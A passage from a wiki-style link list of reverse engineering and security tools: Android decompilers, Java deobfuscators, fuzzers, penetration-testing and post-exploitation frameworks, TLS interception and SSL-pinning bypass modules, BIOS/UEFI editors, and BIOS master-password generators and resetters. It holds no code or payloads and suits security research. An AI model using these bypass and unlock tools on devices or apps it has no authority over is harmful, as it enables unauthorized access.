:*[https://github.com/honeynet/apkinspector/ APKinspector] - is a powerful GUI tool for analysts to analyze the Android applications.&lt;br /&gt;
:*[https://apktool.org/ Apktool] - A tool for reverse engineering Android apk files.&lt;br /&gt;
:*[https://github.com/androguard/androguard Androguard] - is a full python tool to play with Android files. DEX, ODEX; APK; Android's binary xml; Android resources; Disassemble DEX/ODEX bytecodes.&lt;br /&gt;
:*[https://github.com/Konloch/bytecode-viewer Bytecode viewer] - is a Java 8+ Jar &amp;amp; Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger &amp;amp; More)&lt;br /&gt;
:*[https://github.com/niranjan94/show-java ShowJava] - is an APK (android application), JAR &amp;amp; Dex decompiler for android.&lt;br /&gt;
:*[https://github.com/tp7309/TTDeDroid TTDeDroid] - is a tool for quickly decompiling apk/aar/dex/jar.&lt;br /&gt;
:*[https://github.com/JesusFreke/smali smali/baksmali] - is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax.&lt;br /&gt;
&lt;br /&gt;
======RASP (Runtime Application Self-Protection) Android======&lt;br /&gt;
To effectively audit applications, testers often intentionally make their devices vulnerable to simplify testing.&amp;lt;br&amp;gt;&lt;br /&gt;
In response, application developers implement countermeasures such as detecting emulators, debuggers, and checking if the device is secure and not rooted.&amp;lt;br&amp;gt;&lt;br /&gt;
The current focus of this technology is on the vulnerabilities of Java and .NET platforms.&lt;br /&gt;
:*[https://arxiv.org/pdf/2312.17726 arXiv:2312.17726 (cs.CR)] - is a paper regarding Interactive Application Security Testing (IAST) and RASP Tools.&lt;br /&gt;
:*[https://github.com/securevale/android-rasp Android-RASP] - is a solution for protecting Android apps against being run on vulnerable devices.&lt;br /&gt;
&lt;br /&gt;
======JAVA deobfuscators (mixed platforms)======&lt;br /&gt;
There is nothing more annoying than coroutines (ProGuard), c-flow, function virtualization, class and name renaming and junk code while decompiling code. Here are a few off the shelf deobfuscators.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/CalebFenton/simplify simplify] - Android virtual machine and generic deobfuscator.&lt;br /&gt;
:*[https://github.com/java-deobfuscator/deobfuscator deobfuscator] - is a project that aims to deobfuscate most commercially-available obfuscators for Java. [https://github.com/java-deobfuscator/deobfuscator-gui GUI version github]&lt;br /&gt;
:*[https://github.com/GraxCode/threadtear Threadtear] - is a multifunctional deobfuscation tool for java, ZKM and Stringer support, Android support is in development.&lt;br /&gt;
:*[https://github.com/narumii/Deobfuscator Another Deobfuscator] - Some deobfuscator for java. Supports superblaubeere27 / JObf / sb27, Paramorphism 2.1.2_9, Caesium, Monsey, Skid/qProtect, Scuti, CheatBreaker, Bozar, ...&lt;br /&gt;
&lt;br /&gt;
======JAVA decompilers (platform independent)======&lt;br /&gt;
:*[https://github.com/fesh0r/fernflower Fernflower] - is a powerful open-source Java decompiler that reconstructs readable Java source code from compiled bytecode, widely used and integrated into IntelliJ IDEA.&lt;br /&gt;
&lt;br /&gt;
====Debuggers / Disassemblers for '''unmanaged''' binaries====&lt;br /&gt;
&lt;br /&gt;
=====AutoIt=====&lt;br /&gt;
AutoIt decompilers extract or anything else related to reverse engineering AutoIt binaries.&lt;br /&gt;
:*[https://github.com/JacobPimental/exe2aut exe2aut] - is a tool that converts executable (.exe) files into AutoIt script (.aut) source code, attempting to reverse-engineer compiled AutoIt programs.&lt;br /&gt;
:*[https://github.com/nazywam/AutoIt-Ripper AutoIt-Ripper] - is a short python script that allows for extraction of &amp;quot;compiled&amp;quot; AutoIt scripts from PE executables.&lt;br /&gt;
&lt;br /&gt;
=====VB6=====&lt;br /&gt;
Early .NET applications compile native and p-code meaning there is not a easy way to decompile these like with newer .NET framework exectables. &lt;br /&gt;
:*[https://www.vb-decompiler.org/ VB Decompiler Pro] - is a commercial software tool that decompiles and analyzes programs written in Visual Basic 5.0/6.0 and also .NET for reverse engineering and code recovery purposes.&lt;br /&gt;
&lt;br /&gt;
====Bytecode Decompilers====&lt;br /&gt;
&lt;br /&gt;
=====React Native Hermes=====&lt;br /&gt;
If you plan on looking inside a compiled React Native Asset for doing a security audit, these tools come in handy.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/P1sec/hermes-dec hermes-dec] - A reverse engineering tool for decompiling and disassembling the React Native Hermes bytecode.&lt;br /&gt;
:*[https://github.com/Pilfer/hermes_rs hermes_rs] - Bytecode disassembler and assembler.&lt;br /&gt;
:*[https://github.com/bongtrop/hbctool hbctool] - Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode).&lt;br /&gt;
&lt;br /&gt;
=====Python=====&lt;br /&gt;
To reverse or decompile binaries generated by IronPython, which compiles Python code into Common Intermediate Language (CIL) targeting the Common Language Infrastructure (CLI), you should use decompilation tools designed for managed assemblies rather than traditional Python bytecode tools.&lt;br /&gt;
:*[https://github.com/rocky/python-uncompyle6 uncompyle6] - is a native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.&lt;br /&gt;
:*[https://github.com/zrax/pycdc pycdc] - is a C++ python bytecode disassembler and decompiler.&lt;br /&gt;
:*[https://github.com/Cisco-Talos/pyrebox PyREBox] - is a Python scriptable Reverse Engineering sandbox by Cisco-Talos. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective.&lt;br /&gt;
:*[https://github.com/snare/voltron Voltron] - is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host.&lt;br /&gt;
&lt;br /&gt;
=====Lua=====&lt;br /&gt;
:*[https://github.com/scratchminer/unluac unlua] - is a decompiler that converts compiled Lua 5.1 bytecode files (.luac) back into readable Lua source code.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Fuzzers====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/honggfuzz Honggfuzz] - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage (SW and HW based).&lt;br /&gt;
&lt;br /&gt;
*[https://llvm.org/docs/LibFuzzer.html LibFuzzer] - LibFuzzer is an in-process, coverage-guided, evolutionary fuzzing engine.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/AFL '''(ARCHIVED)''' AFL (American fuzzy lop)] - is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/AFLplusplus/AFLplusplus AFL++ (AFLplusplus)] - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel &amp;amp; redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/carolemieux/afl-rb FairFuzz] - is a AFL extension to increase code coverage by targeting rare branches. FairFuzz has a particular advantage on programs with highly nested structure (packet analyzers, xmllint, programs compiled with laf-inte, etc).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/RUB-SysSec/redqueen RedQueen] - is a fast general purpose fuzzer for x86 binary applications. It can automatically overcome checksums and magic bytes without falling back to complex and fragile program analysis techniques, such as symbolic execution.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sslab-gatech/qsym '''(ARCHIVED)''' QSYM] - ia a Practical Concolic Execution Engine Tailored for Hybrid Fuzzing.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/puppet-meteor/MOpt-AFL MOpt-AFL] - is a AFL-based fuzzer that utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness. More details can be found in the technical report. The installation of MOpt-AFL is the same as AFL's.&lt;br /&gt;
&lt;br /&gt;
====PC platform exploration frameworks====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/chipsec/chipsec Chipsec] - is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low level interfaces, and forensic capabilities.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rapid7/metasploit-framework Metasploit Framework] - is a Ruby-based Framework, modular penetration testing platform that enables you to write, test, and execute exploit code.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/BC-SECURITY/Empire Empire] - is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Arachni/arachni Arachni] - is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.&lt;br /&gt;
&lt;br /&gt;
*[https://portswigger.net/burp Burp Suite] - Burp or Burp Suite is a set of tools used for penetration testing of web applications.&lt;br /&gt;
&lt;br /&gt;
====Mobile exploration frameworks====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF] - Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.&lt;br /&gt;
&lt;br /&gt;
*[https://frida.re/ Frida] - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sensepost/objection objection] - is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/xtiankisutsa/MARA_Framework MARA] - is a Mobile Application RE and Analysis Framework. It is a toolkit that puts together commonly used mobile application RE and analysis tools to assist in testing mobile applications against the OWASP mobile security threats.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/EntySec/SeaShell SeaShell] - is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mingyuan-xia/AppAudit AppAudit] - is an efficient program analysis tool that detects data leaks in mobile applications. It can accurately find all leaks within seconds and ~200 MB memory.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/canyie/pine Pine] - is a dynamic java method hook framework on ART runtime, which can intercept almost all java method calls in the current process.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/LSPosed/LSPlant LSPlant] - is an Android ART hook library, providing Java method hook/unhook and inline deoptimization.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/LSPosed/LSPosed LSposed] - is a Riru / Zygisk module trying to provide an ART hooking framework which delivers consistent APIs with the OG Xposed, leveraging LSPlant hooking framework.&lt;br /&gt;
&lt;br /&gt;
::LSPosed Module Repository&lt;br /&gt;
:::*[https://github.com/Xposed-Modules-Repo Xposed Modules Repo] - New Xposed(LSPosed) Module Repository.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ElderDrivers/EdXposed Xposed Framework] - is a framework for mobile exploration hooking and modifying code on the fly. [https://binderfilter.github.io/xposed/ Inline API hooking example].&lt;br /&gt;
&lt;br /&gt;
::Xposed modules&lt;br /&gt;
:::*[https://github.com/Fuzion24/JustTrustMe JustTrustMe] - Art framework hook to patch okHTTP and other common libs to fool the CERT chain in order for Mitmproxy to capture TLS traffic in cleartext.&lt;br /&gt;
:::*[https://github.com/sanfengAndroid/FakeXposed FakeXposed] - Hide xposed, root, file redirection, two-way shielding data detection.&lt;br /&gt;
:::*[https://github.com/ac-pm/SSLUnpinning_Xposed/ SSLUnpinning_Xposed] - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)..&lt;br /&gt;
&lt;br /&gt;
::Xposed Framework API Development Documentation&lt;br /&gt;
:::*[https://api.xposed.info/reference/packages.html Xposed API Reference] - Javadoc reference of the Xposed Framework API. It's meant for module developers who want to understand which classes and methods they can use.&lt;br /&gt;
&lt;br /&gt;
====Network Inspection====&lt;br /&gt;
&lt;br /&gt;
=====Promiscuous mode eavesdropping TCP/UDP=====&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/mitmproxy/mitmproxy Mitmproxy] - is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.&lt;br /&gt;
&lt;br /&gt;
::*[https://gitlab.com/wireshark/wireshark Wireshark] - is a network traffic analyzer, or &amp;quot;sniffer&amp;quot;, for Linux, macOS, &amp;amp;#42;BSD and other Unix and Unix-like operating systems and for Windows.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/zaproxy/zaproxy Zed Attack Proxy (ZAP)] - is an Open Source &amp;amp; easy to use integrated penetration testing tool for finding vulnerabilities in web applications.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/SensePost/Mallet Mallet] - is an intercepting proxy for arbitrary protocols.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/Warxim/petep PETEP (PEnetration TEsting Proxy)] - is an open-source Java application for traffic analysis &amp;amp; modification using TCP/UDP proxies. PETEP is a useful tool for performing penetration tests of applications with various application protocols.&lt;br /&gt;
&lt;br /&gt;
=====HTTP(S) Debuggers / Web Debuggers=====&lt;br /&gt;
&lt;br /&gt;
::*[https://portswigger.net/burp Burp Suite] - is a proxy tool which helps to view, interact, modify web requests. Test, find, and exploit vulnerabilities faster with a complete suite of security testing tools.&lt;br /&gt;
&lt;br /&gt;
::*[https://www.httpdebugger.com/ HTTP Debugger Pro] - is a network traffic analyzer tool that captures, displays, and analyzes HTTP and HTTPS traffic between a web browser or application and the internet for debugging and testing purposes.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/httptoolkit  HTTP Toolkit] - is a beautiful, cross-platform &amp;amp; open-source HTTP(S) debugging proxy, analyzer &amp;amp; client, with built-in support for modern tools from Docker to Android to GraphQL.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/jbittel/httpry httpry] - is a HTTP logging and information retrieval tool written in Perl and C.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/requestly/requestly Requestly] - Bring the power of Charles Proxy, Fiddler &amp;amp; Postman together with beautiful, modern UI &amp;amp; collaboration features.&lt;br /&gt;
&lt;br /&gt;
::*[https://telerik-fiddler.s3.amazonaws.com/fiddler/FiddlerSetup.exe Fiddler] - is a Web Debugger is a serviceable web debugging proxy for logging all HTTP(S) traffic linking your computer and the internet, allowing for traffic inspection, breakpoint setting, and more.&lt;br /&gt;
&lt;br /&gt;
=====Other Network Tools=====&lt;br /&gt;
&lt;br /&gt;
::*[https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview tcpview] - is a tool that will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions (Windows).&lt;br /&gt;
&lt;br /&gt;
::*[https://www.nirsoft.net/utils/cports.html cports] - is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local Windows computer.&lt;br /&gt;
&lt;br /&gt;
::*[https://www.netresec.com/?page=NetworkMinerSourceCode NetworkMiner] - is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.&lt;br /&gt;
&lt;br /&gt;
::*[https://linux.die.net/man/8/netstat netstat] - is a Linux CLI tool to print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====BIOS (basic input/output system) firmware modifying software====&lt;br /&gt;
Unified Extensible Firmware Interface (UEFI) &amp;amp; legacy computer BIOS (basic input/output system) firmware modifying software.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====UEFI=====&lt;br /&gt;
::*[https://github.com/LongSoft/UEFITool UEFITool / UEFIExtract / UEFIFind] - is a UEFI firmware image viewer and editor.&lt;br /&gt;
::*[https://github.com/LongSoft/IFRExtractor-RS IFRExtractor-RS] - is a Rust utility to extract UEFI IFR (Internal Form Representation) data found in a binary file into human-readable text.&lt;br /&gt;
::*[https://github.com/theopolis/uefi-firmware-parser uefi-firmware-parser] - is a cross-platform open source application written in Python. Very tinker-friendly. Can be used in scripts to automate firmware patching.&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.01_x64.exe AMIBCP_5.01_x64] - AMI BIOS Configuration Program (AMIBCP) is a powerful customization utility that enables OEMs/ODMs to customize the Aptio® ROM image without intervening on the source code. [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b VT link]&lt;br /&gt;
::*[https://github.com/tylernguyen/razer15-hackintosh/blob/master/tools/AMIBCP64/AMIBCP64.exe AMIBCP 5.01.0014 x64] [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b/details VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0023.exe AMIBCP_5.02.0023] [https://www.virustotal.com/gui/file/38f7c54098af1544ddba6324e6d1fea6d1462f422ba021f309ad4445dacd0467 VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0031.exe AMIBCP_5.02.0031] [https://www.virustotal.com/gui/file/c7ade67fe0e8f4c22f73ce3168ff6e718086f1eda83cce4c065b4fe49bd5ad99 VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP%205.02.0034.exe AMIBCP 5.02.0034] [https://www.virustotal.com/gui/file/7fe28fb8a7419c95fba428891e5b3914d9e2b365a5a8932da74db52a1c1dabd8 VT link]&lt;br /&gt;
::*[https://github.com/datasone/grub-mod-setup_var grub-mod-setup_var] - a modified grub allowing tweaking hidden BIOS settings. Does not work with newer (2012 &amp;amp; &amp;gt;&amp;gt;) InsydeH2o because of SMM protection or variable locking.&lt;br /&gt;
::*[https://github.com/JamesAmiTw/ru-uefi RU.EFI] - is a UEFI app that allows users to examine and modify UEFI variables within a system's BIOS while the system is running. It's essentially a tool for interacting with and altering firmware settings, and is often used for tasks like unlocking hidden BIOS settings or debugging firmware-related issues. Crashes on newer (2012 &amp;amp; &amp;gt;&amp;gt;) InsydeH2o upon loading from EFI shell possibly because of violating BIOS runtime security policies.&lt;br /&gt;
&lt;br /&gt;
=====BIOS (legacy)=====&lt;br /&gt;
::*[https://forums.mydigitallife.net/threads/tool-to-insert-replace-slic-in-phoenix-insyde-dell-efi-bioses.13194 PhoenixTool] - is a Windows-only freeware GUI application written in C#. Used mostly for SLIC-related modifications, but it not limited to this task. Requires Microsoft .NET 3.5 to work properly. Supports unpacking firmware images from various vendor-specific formats like encrypted HP update files and Dell installers.&lt;br /&gt;
:::'''AMI'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.25.zip AMIBCP_2.25] [https://www.virustotal.com/gui/file/71050f3db40cc6c0a623d66c8eeb05d0a0818226fd11ed787452f4f540d45204 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.43.zip AMIBCP_2.43] [https://www.virustotal.com/gui/file/efa10cfe5f78c16982abf458eb50a4fde152631ad3b77838bd2013a763045ced VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.13.exe AMIBCP_3.13] [https://www.virustotal.com/gui/file/e0a5b1059f04813e72c6d4fa639d32567002fdd86321895b5987224a4518896e VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.37.exe AMIBCP_3.37] [https://www.virustotal.com/gui/file/1174e177b28fb7ecbac6c5043a9e8d78ff4756f657ea72369c5fb6b43b1f2623 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.46.exe AMIBCP_3.46] [https://www.virustotal.com/gui/file/84bd5b151286d4181ef26284d96ca49074e18574b8454c51cb0b34013ee5d073 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.47.exe AMIBCP_3.47] [https://www.virustotal.com/gui/file/20d93c6f868d4638676b7cde2c66c5589433c1480250aa0d774c4feef3337507 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.51.exe AMIBCP_3.51] [https://www.virustotal.com/gui/file/0d630b4b9c34d6c7132249a1a7bc3de33b39779fc90d9a367272cf57b4621aed VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.53.exe AMIBCP_4.53] [https://www.virustotal.com/gui/file/3f90e402dab9f64cbc4514e18bc2625ec7672da806cd9e0ef2e803b0ce104a01 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.55.exe AMIBCP_4.55] [https://www.virustotal.com/gui/file/451ad821a66e9ea89ee0544ce53cfab887dc0bb662a2de95f0e1aa1663dc6e06 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_2.22.1.exe MMTOOL_2.22.1] - MMtool stands for Module Management Tool. As one of AMI's BIOS/UEFI utilities, MMTool allows users to manage firmware file modules within the Aptio ROM image. [https://www.virustotal.com/gui/file/cf49f1e742f5cce68152f3c17df29e5c9aa7fb557c432402199159ffda44e007 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.12.exe MMTOOL_3.12] [https://www.virustotal.com/gui/file/78c3ca427878be5b07058f422914027462d3ac740b0de247169cc0aee4195e3b VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOl_3.19.exe MMTOOl_3.19] [https://www.virustotal.com/gui/file/b4b30c6ff911f18d3383b094628f59aa5ec3b109acd12aaef391acf9720e52af VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.19_Mod_21FiX.exe MMTOOL_3.19_Mod_21FiX] [https://www.virustotal.com/gui/file/66e2717fcac67b073d24916c74bc8d8dd7932b188d20b8b635b511e6195d5855 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22.EXE MMTOOL_3.22] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_1B_21Fix-BKMOD.EXE MMTOOL_3.22_1B_21Fix-BKMOD] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_CN_BKMod.exe MMTOOL_3.22_CN_BKMod] [https://www.virustotal.com/gui/file/f467d75962278a4e01d646cdf8008136912d8a1ddd588c45e2fcee9d7cd17140 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.23_CN_BKMod.exe MMTOOL_3.23_CN_BKMod] [https://www.virustotal.com/gui/file/9bf846d023312c889069b03f5ab7157e270fc67c5d295e745d0a5f27d12a71de VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.26.exe MMTOOL_3.26] [https://www.virustotal.com/gui/file/c5a64ea7ce2bea8556fa81e0069adbba793181bfaa76f59f4f472f0a471bac98 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_4.50.0.23.exe MMTOOL_4.50.0.23][https://www.virustotal.com/gui/file/7d0377a72e67e5a71400361416452440826832aeb2c9bebaa578e8af962eaafd VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.0.07.exe MMTOOL_5.0.07] [https://www.virustotal.com/gui/file/28049163fd1e3423c42b229a5f6ed877f14e7caf3b794bf7efb970b375e6ff41 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0024.exe MMTOOL_5.02.0024] [https://www.virustotal.com/gui/file/bbc3e75905997ddc05c523e57a72e49bbfcaf84dca64e460f10f8553b7fda9ee VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0025.exe MMTOOL_5.02.0025] [https://www.virustotal.com/gui/file/5d05d0bbea720d4b73dc66db55031c2659458696b9f143df3b7e2f43040289cc VT link]&lt;br /&gt;
:::'''Award'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/tree/main/Award_Bios_Editor Award Bios Editor] - is a editor for Award bios.&lt;br /&gt;
:::'''InsydeH2O'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.02.13.zip H2OEZE_x86_WIN_100.00.02.13] - H2OEZE™: Easy BIOS Editor that helps edit binaries in the BIOS, including Option ROMs, driver binaries, logos, and Setup values. [https://www.virustotal.com/gui/file/9660f1bf9436b258ec5ad857a94fbd0ec1f8fbff8ab22ca1dfcfb5ebbdcedf08 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.03.04.zip H2OEZE_x86_WIN_100.00.03.04]  [https://www.virustotal.com/gui/file/2a1005803da854693502093445906eb2cccb24947d6828bc1533ba3603c73b0a VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x64/H2OEZE_x64_WIN_100.00.03.04.rar H2OEZE_x64_WIN_100.00.03.04]  [https://www.virustotal.com/gui/file/20d2d0336d30afd0b1961eb42dc061ce66a6fcfbfba1530e7abd9be883dcb45c VT link]&lt;br /&gt;
:::'''Phoenix'''&lt;br /&gt;
:::*[[Media:PhoenixBiosEditor2.2.13.zip]] (pw: recessim.com [https://www.virustotal.com/gui/file/3abf75ea7386f3dc24156bf6175a940867b8c742246cb8bf257fe5fc0b1cf9b5 VT link]) - is a software tool used to view and modify the settings and structure of Phoenix BIOS firmware images dating from between 2004 and 2008.&lt;br /&gt;
&lt;br /&gt;
:Download all* the above tools in one archive, [https://github.com/direstraits96/BIOS-MOD-TOOLS/archive/refs/heads/main.zip click here]. [https://www.virustotal.com/gui/file/d8a75883ca8d292adcf40e5ed88584579b1c0c69f6ad5837fc56747233c56f9c VT link]&lt;br /&gt;
&lt;br /&gt;
:::'''Tool collections'''&lt;br /&gt;
:::*[http://xdel.ru/downloads/bios-mods.com-tools/ bios-mods.com tools (2016)] - is a collection of bios modifying and flashing tools.&lt;br /&gt;
&lt;br /&gt;
:::'''Microcode Extraction Tool'''&lt;br /&gt;
:::*[https://github.com/platomav/MCExtractor MCExtractor] - is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc.&lt;br /&gt;
&lt;br /&gt;
:Bios password resetting&lt;br /&gt;
::*[https://archive.org/details/hp-bios-reset-mazzif HP BIOS Password Reset by MAZZIF] [https://www.virustotal.com/gui/file/9ddd094edc286f2cb8d63158d226986d9a0c184ca450580dfaf9754005df9d41 VT link] - A live USB tool made by Mazzif to reset older HP Probook and Elitebook BIOS passwords.&lt;br /&gt;
&lt;br /&gt;
::*[[Media:Fujitsu bios unlock.zip|pwgen-fsi-6x4dec.py]] [https://www.virustotal.com/gui/file/3a43ba7c88f1f10576728ea291b3097c048f842eee30dda3121280c049c61b8a VT link] pwgen-fsi-6x4dec.py - is a python command-line utility for generating master unlock password for older Fujitsu notebooks. Tested on: E557, FH570, Q616, U728, T731, E734, U745, S752, E756&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/dogbert/bios-pwgen/tree/master bios-pwgen] - BIOS Master Password Generators for older laptops [http://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html blogpost] (dell, asus, fsi6x4, fxi-hex hpmini, insyde, samsung, sony-4x4, sony-serial).&lt;br /&gt;
&lt;br /&gt;
::*[[Media:AMITSEDecrypt.zip]] [https://www.virustotal.com/gui/file/2b03ef2292863bd94dc6ce0f10412f27ec5abf95f1e3aca2d34dd3712fd45d12 VT link] - AMI supervisor password decoder called &amp;quot;AMITSEDecrypt&amp;quot; to decode them with the XOR key. Works on older AMI firmware images is able to recover supervisor password if set.&lt;br /&gt;
&lt;br /&gt;
::*[https://bios-pw.org/ BIOS Master Password Generator (bios-pw.org)] - is a website that provides default or master BIOS unlock passwords for various laptop brands based on the system-generated hash or code displayed after too many failed BIOS password attempts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====HM70 PCH chipset Bypass Unsupported CPU=====&lt;br /&gt;
